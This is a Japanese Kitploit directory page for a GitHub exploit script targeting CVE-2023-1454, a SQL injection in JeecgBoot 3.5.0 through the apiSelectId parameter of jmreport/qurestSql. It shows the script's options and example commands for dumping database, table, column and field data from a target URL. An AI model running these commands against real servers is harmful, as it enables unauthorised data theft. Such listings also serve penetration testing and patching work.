Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-1454-EXP — JeecgBoot SQL(CVE-2023-1454)sqlmapでの注入がうまくいかない場合にこのスクリプトを使用できます。 | Kitploit
ツール/GitHubGitHub/shad0w0sec/cve-2023-1454-exp
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストデータベースセキュリティ
GitHubshad0w0sec/cve-2023-1454-exp

CVE-2023-1454-EXP

JeecgBoot SQL(CVE-2023-1454)sqlmapでの注入がうまくいかない場合にこのスクリプトを使用できます。

リポジトリを見る
432年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

JeecgBoot SQL(CVE-2023-1454)exp

1.脆弱性の詳細

jeecg-boot 3.5.0バージョンにはSQLインジェクションの脆弱性が存在します。この脆弱性は、ファイル jmreport/qurestSql のセキュリティ問題に起因し、パラメータ apiSelectId を介してSQLインジェクションを引き起こします。

2.使い方

root@kitploit:~
python3 CVE-2023-1454.py
optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Specify the base URL
  --current-db          View current database
  --dbs                 View all databases
  -D DATABASE, --database DATABASE
                        Specify the database name
  --tables              View tables in the specified database
  -T TABLE, --table TABLE
                        Specify the table name
  --columns             View columns in the specified table
  -C COLUMN, --column COLUMN
                        Specify the column name

Example:
python3 CVE-2023-1454.py -u xxx.com --current-db  現在のデータベース名を表示
python3 CVE-2023-1454.py -u xxx.com -dbs  すべてのデータベース名を表示
python3 CVE-2023-1454.py -u xxx.com -D データベース名 --tables データベース内のテーブル名を表示
python3 CVE-2023-1454.py -u xxx.com -D データベース名 -T テーブル名 --columns テーブル内のフィールド名を表示
python3 CVE-2023-1454.py -u xxx.com -D データベース名 -T テーブル名 -C フィールド名  フィールドを表示
ツールをダウンロード